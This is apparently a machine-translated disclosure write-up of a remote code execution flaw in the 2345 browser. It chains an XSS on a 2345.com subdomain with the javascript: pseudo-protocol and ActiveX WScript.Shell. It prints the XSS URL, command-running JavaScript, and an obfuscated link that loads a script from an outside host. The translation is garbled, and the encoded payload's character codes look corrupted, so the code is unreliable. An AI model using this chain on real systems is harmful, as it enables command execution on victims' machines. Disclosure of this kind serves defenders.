2345 remote code execution may be caused by browser design defects

2345 remote code execution may be caused by browser design defects

Simple and violent. 20rank has no sense of violation.

2345 update the browser to the latest version:
 

The current 2345 browser still allows javascript: // pseudo protocol to define the home page, but these are not the focus of this article. The focus is on command execution caused by a serious design defect.



In the case I submitted earlier, I explored how to debug some poc. When I tested my 2345 network favorites, I was surprised to find that the links in my favorites could execute commands:
 

That is to say, here we are not a traditional 2345: //, nor a traditional privileged domain, but because of the Javascript: // protocol, we directly call the 2345: // protocol, that is, the local region is used to execute the code. As a result, it is very harmful.



However, after a detailed test, we found that not all domains can do this. After a fuzzy test, we found that xss under * .2345.com can implement this function.



Therefore, we need to find an xss in the .2345.com domain, which is not difficult for us.



Http://skin.chrome.2345.com /? A = % 3 Cimg % 20src = 1% 20 onerror = alert (1) % 3E



Xss will be intercepted by chrome, but the default configuration of 2345 browser will not be blocked:
 

The privileged domain is available and you know what to do.

Construct the defect code:
 

var f=document.createElement("a");f.href='javascript：WSH=new ActiveXObject("WScript.Shell");WSH.run("calc.exe")';document.body.appendChild(f);f.click();

For details, see:

Http://wutongyu.info/alert.js



Although it is triggered only when a tag is clicked, we can use the js click () function to automatically trigger it.



Link generated after deformation:

Http://skin.chrome.2345.com /? A = % 3 Cimg % 20src = 1% 20 onerror = eval ('window. s = document. createElement (String. fromCharCode (115,99, 114,105,112,116); window. s. src = String. fromCharCode (104,116,116,112, 47,119,117,116,111,110,103,121,117, 46,105,110,102,111, 108,101,114,116, 46,106,115,); document. body. appendChild (window. s) ') % 3E



Use the latest 2345 browser to access the above url:
 

Simple and violent.

Use the latest 2345 browser to access the above url:

 

 

Solution:

Review the hazards of javascript: // protocol in your browser. When any website calls a href = "javascript: //", it should be opened on a's current website.

The xss is fixed here, but it seems to be a cure.